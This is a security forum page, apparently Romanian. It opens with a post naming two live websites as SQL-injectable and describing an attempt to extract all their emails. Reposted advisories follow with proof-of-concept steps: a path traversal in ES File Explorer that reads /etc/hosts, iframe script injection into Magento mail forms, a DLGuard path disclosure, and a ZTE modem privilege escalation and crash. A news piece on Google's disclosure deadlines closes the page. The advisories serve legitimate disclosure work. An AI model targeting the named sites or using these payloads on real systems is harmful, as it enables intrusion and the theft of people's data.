Search the Community

SQL Vulnerability cu multe email-uri ! din cate stiu eu la ultima verificare am stat 2 ore si tot nu am reusit sa extrag toate email-urile ! http://www.maritime-database.com/company.php?cid=306976 http://www.psychicguild.com/dream_interpretation.php?id=16882

Document Title: =============== ES File Explorer v3.2.4.1 - Path Traversal Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1435 CVE-ID: ======= CVE-2015-1876 Release Date: ============= 2015-02-17 Vulnerability Laboratory ID (VL-ID): ==================================== 1435 Common Vulnerability Scoring System: ==================================== 7.8 Product & Service Introduction: =============================== ES File Explorer is a free all-in-one including a file manager & application & tasks, support for online storage spaces (Dropbox, Google Drive, SkyDrive, Box.net, Sugarsync, Yandex, Amazon S3), FTP & Samba client to explore the images, music, videos, documents and other files from your phone and your computer. It allows Android users around the world to manage their resources for free; you can see the files on your phone, access from anywhere and share them with others; it allows you to easily manage your photos or watch videos, stay connected on 3G, EDGE or WiFi, and share with friends. (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.estrongs.android.pop ) Abstract Advisory Information: ============================== An independent vulnerability laboraotory researcher discovered a path traversal web vulnerability in the official ES File Explorer v3.2.4.1 mobile android web-application. Vulnerability Disclosure Timeline: ================================== 2015-02-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== ES APP GROUP Product: ES File Explorer - Mobile Web Application (Android) 3.2.4.1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A Path Traveral web vulnerability has been discovered in the official in the official ES File Explorer v3.2.4.1 mobile android web-application. The security vulnerability allows a remote attacker to unauthorized request local files and device system paths to compromise the application or device. The vulnerability is located in the `content://com.estrongs.files/system/` path request with the <file> context. The vulnerability can be exploited by local or remote attackers without user interaction. The attacker needs to replace the sdcard path request in the com.estrongs.files/system with a malicious path request like ./etc/passwd ./etc/hosts and continues the request. The attack vector is located on the application-side of the service and the request is http. The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.8. Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction. Successful exploitation of the vulnerability results in mobile application compromise Request Method(s): [+] POST & Sync Vulnerable Module(s): [+] content://com.estrongs.files/ Vulnerable Parameter(s): [+] path Affected Module(s): [+] content://com.estrongs.files/system/ Proof of Concept (PoC): ======================= The arbitrary code execution vulnerability can be exploited by remote attackers without user interaction or privileged application user account. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. --- PoC Session Logs --- Package: com.estrongs.android.pop Application Label: ES File Explorer Process Name: com.estrongs.android.pop Version: 3.2.4.1 Data Directory: /data/data/com.estrongs.android.pop APK Path: /data/app/com.estrongs.android.pop-2.apk UID: 10235 GID: [3003, 3002, 3001, 1015, 1028] Permissions: - android.permission.WRITE_SETTINGS - android.permission.CHANGE_WIFI_STATE - android.permission.CHANGE_NETWORK_STATE - android.permission.INTERNET - android.permission.SET_WALLPAPER - android.permission.ACCESS_NETWORK_STATE - android.permission.ACCESS_WIFI_STATE - com.android.launcher.permission.INSTALL_SHORTCUT - com.android.launcher.permission.UNINSTALL_SHORTCUT - android.permission.BLUETOOTH - android.permission.BLUETOOTH_ADMIN - android.permission.WRITE_EXTERNAL_STORAGE - android.permission.WRITE_MEDIA_STORAGE - android.permission.WAKE_LOCK - android.permission.READ_PHONE_STATE - android.permission.ACCESS_SUPERUSER - android.permission.VIBRATE - .PERMISSION - android.permission.CHANGE_WIFI_MULTICAST_STATE - android.permission.SYSTEM_ALERT_WINDOW - android.permission.GET_TASKS - android.permission.READ_EXTERNAL_STORAGE Defines Permissions: - None Activities: com.estrongs.android.pop.view.FileExplorerActivity com.estrongs.android.pop.app.compress.CompressionActivity com.estrongs.android.pop.app.compress.CompressionProxyActivity com.estrongs.android.pop.app.ESFileSharingActivity com.estrongs.android.pop.app.SaveToESActivity com.estrongs.android.pop.app.LocalFileSharingActivity com.estrongs.android.pop.app.PopVideoPlayer com.estrongs.android.pop.app.PopVideoPlayerProxyActivity com.estrongs.android.pop.app.AudioPlayerProxyActivity com.estrongs.android.pop.app.editor.PopNoteEditor com.estrongs.android.pop.app.FileChooserActivity com.estrongs.android.pop.app.ESContentChooserActivity com.estrongs.android.pop.app.ESRingtoneChooserActivity com.estrongs.android.pop.app.ESWallPaperChooserActivity com.estrongs.android.pop.app.DownloaderActivity com.estrongs.android.pop.app.BrowserDownloaderActivity com.estrongs.android.pop.app.PopRemoteImageBrowser com.estrongs.android.pop.ftp.ESFtpShortcut com.estrongs.android.pop.app.ShowDialogActivity com.estrongs.android.pop.app.AppCheckUpdateList com.estrongs.android.pop.app.DefaultWindowSetting com.estrongs.android.pop.app.DocumentExtModifyList com.estrongs.android.pop.app.TransitActivity Broadcast(Receiver): com.estrongs.android.pop.app.AudioPlayerService$MediaButtonReceiver com.baidu.share.message.ShareReceiver com.estrongs.android.pop.EnableOEMConfig com.estrongs.android.pop.app.InstallMonitorReceiver com.estrongs.android.pop.app.StartServiceReceiver Services: com.estrongs.android.pop.bt.OBEXFtpServerService Permission: null Providers: Authority: com.estrongs.files Read Permission: null Write Permission: null Content Provider: com.estrongs.android.pop.app.FileContentProvider Multiprocess Allowed: False Grant Uri Permissions: True read content://com.estrongs.files/system/../../../../../sdcard/<file> Read file hosts read content://com.estrongs.files/system/etc/hosts 127.0.0.1 localhost Solution - Fix & Patch: ======================= In the AndroidManifest.xml file of each application that contains a content provider, it was recommended that read and write permissions are set. Vulnerable code: com.estrongs.files Read Permission: null Write Permission: null android:exported="true" change "true" to "false" When the value is "false", only components of the same application or applications with the same user ID can start the service or bind to it. <provider android:authorities="com.estrongs.files" android:exported="true" android:grantUriPermissions="true" android:name="com.estrongs.android.pop.app.FileContentProvider"/> Fixed code: <provider android:authorities="com.estrongs.files" android:exported="false" android:grantUriPermissions="true" android:name="com.estrongs.android.pop.app.FileContentProvider"/> read content://com.estrongs.files/system/etc/hosts Permission Denial: opening provider com.estrongs.android.pop.app.FileContentProv ider from ProcessRecord{4192d1a0 32050:com.mwr.dz:remote/u0a216} (pid=32050, uid =10216) that is not exported from uid 10235 Security Risk: ============== The security risk of the path traversal web vulnerability in the android app is estimated as high. (CVSS 7.8) Credits & Authors: ================== Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ Source

Document Title: =============== Ebay Inc Magento Bug Bounty #5 - Persistent Validation & Mail Encoding Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1226 eBay Inc. Bug Bounty Program ID: EIBBP-27288 Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/02/14/ebay-inc-magento-2015q1-official-bug-bounty-program-rewards-security-researcher Release Date: ============= 2015-02-14 Vulnerability Laboratory ID (VL-ID): ==================================== 1226 Common Vulnerability Scoring System: ==================================== 3.8 Product & Service Introduction: =============================== Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites. Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability inside our system, please tell us right away. ( Copy of the Vendor Homepage: http://magento.com/security & http://magento.com/security ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered an application-side input validation and mail encoding web vulnerability in the official eBay Magento and Magento info web-application. Vulnerability Disclosure Timeline: ================================== 2014-03-14: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2014-03-15: Vendor Notification (eBay Inc Security Team - Bug Bounty Program) 2014-03-10: Vendor Response/Feedback (eBay Inc Security Team - Bug Bounty Program) 2015-02-12: Vendor Fix/Patch (Magento Developer Team) 2015-02-13: Bug Bounty Reward (eBay Inc Security Team - Bug Bounty Program) 2015-02-14: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Ebay Inc. Product: Magento - Web Application Service 2014 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ An application-side mail encoding web vulnerability has been discovered in the official eBay Magento & Info Web-Application. The vulnerability allows remote attackers to bypass the outgoing mail filter validation of the magento web-server & web-application. The vulnerability is located in the first- and lastname values of the `Talk to a Specialist` module. Remote attackers without privileged application user account are able to inject persistent malicious script codes. The script code execution occurs in the notification mail to the specialist but also to the active user copy mail. The persistent injected script code executes in the header section were the database context of the first- and lastname will be displayed. The sender interacts automatically by usage of the magento.com & info.magento.com service. The validation of the db stored outgoing values is wrong encoded and allows persistent injections of malicious script codes via POST method. The attack vector is persistent and the injection request method is POST. The security risk of the mail encoding web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the web vulnerability requires no privileged web-application user account and low or medium user interaction because of the persistent attack vector. Successful exploitation of the encoding vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation of web header or mail body context. Vulnerable Domain(s): [+] magento.com & info.magento.com Vulnerable Module(s): [+] Talk to a Specialist Vulnerable Parameter(s): [+] firstname [+] lastname [+] companyname Affected Sender(s): [+] info@magento.com Affected Receiver(s): [+] bkm@evolution-sec.com Affected Context Module(s): [+] Section 1 > mktEditable Proof of Concept (PoC): ======================= The application-side input validation web vulnerability can be exploited by remote attackers without privileged user account and with low or medium user interaction. For security demonstration or to reproduce the mail encoding web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce of the vulnerability ... 1. You do not need to register an account 2. Open up the main website and switch to the magento.com contacts site 3. On the bottom you need to click the `talk to specialist` button 4. You get redirect to a regular valid formular with a mod specialist notification 5. Inject your script code payloads as first-, last- and companyname values 6. Click the send request button ... Note: Now, you will be redirected by the service after choosing a specialist ... we used `E.C. Kraus` (#sry 7. Send the same request from the input below to the specialist with a non malicious test payload 8. The persistent code execution occurs in the mail to the manager aka specialist but also to the sender of the notification itself (without user auth!) 9. Successful reproduce of the persistent script code injection web vulnerability via POST method request PoC: Your E.C. Kraus Magento Enterprise Case Study Download <html><head> <title>Your E.C. Kraus Magento Enterprise Case Study Download</title> <link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css"> </head> <body> <table class="header-part1" border="0" cellpadding="0" cellspacing="0" width="100%"> <tbody><tr><td><b>Betreff: </b>Your E.C. Kraus Magento Enterprise Case Study Download</td></tr><tr><td> <b>Von: </b>Magento <info@magento.com></td></tr><tr><td><b>Datum: </b>15.03.2014 20:27</td></tr></tbody></table> <table class="header-part2" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><b>An: </b>bkm@evolution-sec.com</td></tr></tbody></table><br> <meta http-equiv="Content-Type" content="text/html; "> <title></title> <div id="Section 1" class="mktEditable"><p>Dear a "><[PERSISTENT INJECTED SCRIPT CODE 1!]">%20<[PERSISTENT INJECTED SCRIPT CODE 2!]>,</p> <p>Thank you for requesting the Magento Enterprise Case Study on E.C. Kraus. You can download the Case Study here:</p> <p><a href= "http://email.magento.com/397EXO8770000EP01aGC801" >Download</a></p> <p>Check out our complete list of <a href= "http://email.magento.com/397EXO8770000EQ01aGC801" >Magento Case Studies</a></p> <p>To learn more about Magento Enterprise or to reqeust a personalized quote, please <a href= "http://email.magento.com/397EXO8770000ER01aGC801" >contact out Magento Enterprise team</a>.</p> <p>Thank you,</p> <p>The Magento Team</p></div> <IMG SRC="http://email.magento.com/trk?t=1&mid=Mzk3LUVYTy04Nzc6MDozMzkyOjExMzI1OjA6MzMxNzo3OjE3MzIzNDI4LTE6bnVsbA%3D%3D" WIDTH="1" HEIGHT="1" BORDER="0" ALT="" /> </body> </html> </body> </html> </iframe></p></div></body></html> --- PoC Session Logs [POST] --- 21:15:18.356[654ms][total 2913ms] Status: 200[OK] GET http://magento.com/explore/contact-sales Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[magento.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://magento.com/customers/customer-showcase] Cookie[optimizelySegments=%7B%22239237138%22%3A%22direct%22%2C%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%7D; optimizelyEndUserId=oeu1394911379094r0.20693940633527685; optimizelyBuckets=%7B%7D; _ga=GA1.2.394130418.1394911379; has_js=1; ClrSSID=1394911380598-4406; ClrOSSID=1394911380598-4406; ClrSCD=1394911380598; s_cc=true; s_fid=5EF56BF224B1A40C-0256902EC3CD13C6; gpv_pn=%2Fcustomers%2Fcustomer-showcase; undefined_s=First%20Visit; s_vnum=1396303200710%26vn%3D1; s_invisit=true; s_sq=magentomagento%2Cmagentoglobal%3D%2526pid%253D%25252Fcustomers%25252Fcustomer-showcase%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmagento.com%25252Fexplore%25252Fcontact-sales_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=-%2C84%2C84%2C2200; utm_src=a%3A6%3A%7Bs%3A8%3A%22campaign%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22medium%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22source%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A7%3A%22keyword%22%3Bs%3A0%3A%22%22%3Bs%3A3%3A%22url%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A4%3A%22time%22%3Bi%3A1394911525%3B%7D; _mkto_trk=id:397-EXO-877&token:_mch-magento.com-1394911532816-55587; _tsm=m%3DDirect%2520%252F%2520Brand%2520Aware%253A%2520Typed%2520%252F%2520Bookmarked%2520%252F%2520etc%7Cs%3Dmagento.com%7Crp%3D%252Fwww.magentocommerce.com%252Fdownload%7Crd%3Dmagento.com] Connection[keep-alive] If-None-Match["1394841413-1"] Response Header: Server[maged] Date[Sat, 15 Mar 2014 20:15:18 GMT] Content-Type[text/html; charset=utf-8] Transfer-Encoding[chunked] Connection[keep-alive] X-Drupal-Cache[HIT] Etag["1394841413-1"] x-content-type-options[nosniff] X-Frame-Options[SameOrigin] Content-Language[en] Link[<http://magento.com/explore/contact-sales>; rel="canonical",<http://magento.com/node/22>; rel="shortlink"] Cache-Control[public, max-age=86400] Last-Modified[Fri, 14 Mar 2014 23:56:53 +0000] Expires[Sun, 19 Nov 1978 05:00:00 GMT] Vary[Cookie, Accept-Encoding] Content-Encoding[gzip] X-Server[web04] - 21:15:34.123[335ms][total 335ms] Status: 302[Found] POST https://info.magento.com/index.php/leadCapture/save Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[135] Mime Type[text/html] Request Header: Host[info.magento.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://info.magento.com/EC-Kraus.html] Cookie[optimizelySegments=%7B%22239237138%22%3A%22direct%22%2C%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%7D; optimizelyEndUserId=oeu1394911379094r0.20693940633527685; optimizelyBuckets=%7B%7D; _ga=GA1.2.394130418.1394911379; BIGipServerabjweb-ssl2_http=3892838666.20480.0000; s_cc=true; s_fid=5EF56BF224B1A40C-0256902EC3CD13C6; gpv_pn=%2Fec-kraus.html; undefined_s=First%20Visit; s_vnum=1396303200710%26vn%3D1; s_invisit=true; s_sq=magentoinfo%2Cmagentoglobal%3D%2526pid%253D%25252Fec-kraus.html%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BformSubmit%252528document.getElementById%252528%252522mktForm_1129%252522%252529%252529%25253Breturnfalse%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT; s_ppv=-%2C100%2C100%2C832; utm_src=a%3A6%3A%7Bs%3A8%3A%22campaign%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22medium%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22source%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A7%3A%22keyword%22%3Bs%3A0%3A%22%22%3Bs%3A3%3A%22url%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A4%3A%22time%22%3Bi%3A1394911525%3B%7D; BIGipServerabjweb-ssl2_https=3909615882.47873.0000; ClrSSID=1394911532386-9188; ClrOSSID=1394911532386-9188; ClrSCD=1394911532386; _mkto_trk=id:397-EXO-877&token:_mch-magento.com-1394911532816-55587; _tsm=m%3DDirect%2520%252F%2520Brand%2520Aware%253A%2520Typed%2520%252F%2520Bookmarked%2520%252F%2520etc%7Cs%3Dmagento.com%7Crp%3D%252Fwww.magentocommerce.com%252Fdownload%7Crd%3Dmagento.com; optimizelyPendingLogEvents=%5B%5D; ClrCSTO=T] Connection[keep-alive] POST-Daten: FirstName[%3Ciframe+src%3Da%3E] LastName[%3Ciframe+src%3Da%3E] Email[bkm%40evolution-sec.com] _marketo_comments[] lpId[2314] subId[36] munchkinId[397-EXO-877] kw[not+found] cr[not+found] searchstr[not+found] lpurl[https%3A%2F%2Finfo.magento.com%2FEC-Kraus.html%3Fcr%3D%7Bcreative%7D%26kw%3D%7Bkeyword%7D] formid[1129] returnURL[https%3A%2F%2Finfo.magento.com%2FEC-Kraus-confirm.html] retURL[https%3A%2F%2Finfo.magento.com%2FEC-Kraus-confirm.html] returnLPId[2301] _mkt_disp[return] _mkt_trk[id%3A397-EXO-877%26token%3A_mch-magento.com-1394911532816-55587] _comments_marketo[] _mkto_version[2.4.7] Response Header: Date[Sat, 15 Mar 2014 20:15:34 GMT] Server[Apache] Location[https://info.magento.com/EC-Kraus-confirm.html?aliId=67114725] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[135] Connection[close] Content-Type[text/html] Reference(s): http://magento.com/customers/customer-showcase http://magento.com/explore/contact-sales https://info.magento.com/EC-Kraus-confirm.html?aliId=67114607 https://info.magento.com/EC-Kraus.html https://info.magento.com/index.php/leadCapture/save Resource(s): ../Contact Sales _ Magento-inputstep1.htm ../Contact Sales _ Magento-inputstep2.htm ../EC-Kraus-confirm.html ../EC-Kraus-poc2.html ../Your E.C. Kraus Magento Enterprise Case Study Download.html ../Your E.C. Kraus Magento Enterprise Case Study Download.eml ../poc-session-logs.txt ../poc-url-references.txt Picture(s): (view magazine article) ../1.png ../2.png ../3.png ../4.png ../5.png ../6.png ../7.png Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse or encode of the `talk to a specialist` input context. Encode and parse also the outgoing user values of the talk to a specialist form to prevent persistent injections via POST to outgoing service ebay magento mails. Restrict the input and disallow the usage of special chars. Security Risk: ============== The security risk of the persistent input validation and mail encoding web vulnerability is estimated as medium. (CVSS 3.8) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source

*DLGuard Full Path Disclosure (Information Leakage) Security Vulnerabilities* Exploit Title: DLGuard /index.php c parameter Full Path Disclosure Security Vulnerabilities Product: DLGuard Vendor: DLGuard Vulnerable Versions: v4.5 Tested Version: v4.5 Advisory Publication: Feb 18, 2015 Latest Update: Feb 18, 2015 Vulnerability Type: Information Exposure [CWE-200] CVE Reference: * Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore] *Advisory Details:* *(1) Vendor & Product Description:* *Vendor:* DLGuard *Product & Version:* DLGuard v4.5 *Vendor URL & Download:* DLGuard can be downloaded from here, http://www.dlguard.com/dlginfo/index.php *Product Introduction:* “DLGuard is a powerful, yet easy to use script that you simply upload to your website and then rest assured that your internet business is not only safe, but also much easier to manage, automating the tasks you just don't have the time for." "DLGuard supports the three types, or methods, of sale on the internet: <1>Single item sales (including bonus products!) <2>Multiple item sales <3>Membership websites" *(2) Vulnerability Details:* DLGuard has a security problem. It can be exploited by Full Path Disclosure attacks. *(2.1)* The first vulnerability occurs at “index.php” page with ""c" parameters of it. *References:* http://tetraph.com/security/full-path-disclosure-vulnerability/dlguard-full-path-disclosure-information-leakage-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/02/dlguard-full-path-disclosure.html -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/justqdjing Source

Document Title: =============== ZTE Datacard Telecom MF626 Modem (PCW_TNZNZLV1.0.0B02) - Multiple Vulnerabilities Release Date: ============= 2015-02-09 References (Source): ==================== http://zero-way.net/forum/forum/pentration-testing/exploits/locals/235-zte-datacard-telecom-mf626-modem-pcw_tnznzlv1-0-0b02-multiple-vulnerabilities Product & Service Introduction: =============================== http://www.zte.com.cn http://www.zte.co.nz/main/Product_Downloads/MF626_downloads.htm Affected Product(s): ==================== ZTE Corporation Product: ZTE Datacard Telecom MF626 Modem (PCW_TNZNZLV1.0.0B02) Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local privilege escalation vulnerability has been discovered in the official ZTE Datacard Telecom MF626 Modem (PCW_TNZNZLV1.0.0B02) application software. The local security vulnerability allows an attackers to gain higher access privileges by exploitation of a insecure permission misconfiguration. The software suffers from a local privilege escalation vulnerability. Users are able to change the file with executable access to a binary of choice. The issue is located in the misconfigured permissions values with the `F`(full) flag in the users and everyone group. The permissions are set to all the binary files of the software in the same location. The files are installed in the `Ucell Internet` directory. The group/user permission for the path is assigned to the everyone group. The full path with the permission misconfiguration allows local low privileged system user accounts to exploit the vulnerability to gain higher access privileges. After the attacker replaced the binary file with the malicious code he can reboot the system to gain higher access privileges. At the end the attacker is able to fully compromises the system by local exploitation. T The third discovered vulnerability is a denial of service bug that affects the local process. Local attackers are able to manipulate the networkCfg.xml to crash the application with a runtime error that results in a unhandled exception. Proof of Concept (PoC): ======================= The vulnerabilities can be exploited by local attackers with restricted account privileges and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. --- PoC Session Logs Local Privilege Escalation --- C:\Users\s-dz\Desktop>accesschk.exe -dqv "C:\Program Files\Telecom Connection Manager" C:\Program Files\Telecom Connection Manager Medium Mandatory Level (Default) [No-Write-Up] RW Tout le monde FILE_ALL_ACCESS RW NT SERVICE\TrustedInstaller FILE_ALL_ACCESS RW AUTORITE NT\SystÞme FILE_ALL_ACCESS RW BUILTIN\Administrateurs FILE_ALL_ACCESS R BUILTIN\Utilisateurs FILE_LIST_DIRECTORY FILE_READ_ATTRIBUTES FILE_READ_EA FILE_TRAVERSE SYNCHRONIZE READ_CONTROL C:\Users\s-dz\Desktop> C:\Users\s-dz\Desktop>icacls "C:\Program Files\Telecom Connection Manager" C:\Program Files\Telecom Connection Manager Tout le monde:(F) Tout le monde:(OI)(CI)(IO)(F) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) AUTORITE NT\Système:(I)(F) AUTORITE NT\Système:(I)(OI)(CI)(IO)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Administrateurs:(I)(OI)(CI)(IO)(F) BUILTIN\Utilisateurs:(I)(RX) BUILTIN\Utilisateurs:(I)(OI)(CI)(IO)(GR,GE) CREATEUR PROPRIETAIRE:(I)(OI)(CI)(IO)(F) 1 fichiers correctement traités ; échec du traitement de 0 fichiers C:\Users\s-dz\Desktop> --- PoC Local DoS --- first go to C:\program files\Internet Mobile\networkCfg.xml (Network configuration) and write "A" * 3000 in <ConfigFileName>"A" x 3000</ConfigFileName> . Save it open the program . poc will crash ... Credits & Authors: ================== Hadji Samir s-dz@hotmail.fr Source

Google’s unwavering vulnerability disclosure deadlines are the latest chapter in a decades-long debate about how to best inform affected users that there’s a security problem with their software. Since the start of the year, Google’s 90-day clock has most notably ticked down to zero on a trio of flaws in Microsoft products and two others in Apple’s OS X. And upon doing so, Google’s researchers shared with the world technical details and proof of concept code for each vulnerability. Proponents of Google’s policy will argue that 90 days is plenty of time for a vendor to address a “responsibly” disclosed vulnerability. Opponents argue that a zero day is a zero day, and in such cases, a greater cut of attackers has vital information for exploit building when the details are public. Google, being the giant that it is, threw more gasoline on the controversial fire when, with one of the Microsoft flaws, it refused to sit on the details reportedly for two more days until Microsoft said it would be ready with a patch. Today, Google announced several adjustments to its disclosure policy, one of them being a 14-day grace period afforded to vendors that inform Google before the expiration of the 90-day deadline that a patch is scheduled for release within the 14-day extension. “Public disclosure of an unpatched issue now only occurs if a deadline will be significantly missed (2 weeks+),” the Project Zero team said in its announcement. “As always, we reserve the right to bring deadlines forwards or backwards based on extreme circumstances. We remain committed to treating all vendors strictly equally,” the researchers wrote. “Google expects to be held to the same standard; in fact, Project Zero has bugs in the pipeline for Google products (Chrome and Android) and these are subject to the same deadline policy.” Google also announced that the first public mention of a vulnerability needs to include a CVE identifier and that Google will obtain a pre-assigned one for vulnerabilities that go past deadline. It also said that if a 90-day deadline expires on a weekend or a U.S. public holiday, the deadline will be extended to the next working day. “Putting everything together, we believe the policy updates are still strongly in line with our desire to improve industry response times to security bugs, but will result in softer landings for bugs marginally over deadline,” Google said. “Finally, we’d like to call on all researchers to adopt disclosure deadlines in some form, and feel free to use our policy verbatim if you find our data and reasoning compelling.” This should make some major vendors breathe a little easier. Microsoft, for its part, said that it disagrees with arbitrary deadlines because of the uniqueness of vulnerabilities and variables introduced during patch development and testing time. “We prioritize security updates based on the probability and impact to customers,” said Chris Betz, head of the Microsoft Security Response Center. “When finders publically disclose vulnerability information with exploit details, they are increasing the potential for attack for millions of customers.” Google isn’t the only major technology company with a disclosure deadline. HP’s Zero Day Initiative, one of the first vulnerability programs, has a 120-day deadline, while CERT at the Software Engineering Institute at Carnegie Mellon University, a DHS-sponsored organization, has a 45-day deadline. Deadlines ensure that vendors don’t sit on vulnerabilities for months, or years in some cases. “The idea of disclosure deadlines is an old one and in practice in a lot of organizations,” said Katie Moussouris, chief policy officer at HackerOne. “The idea behind it is that people are protected and risk is minimized by limiting the window of exposure caused by an unpatched vulnerability.” Google, 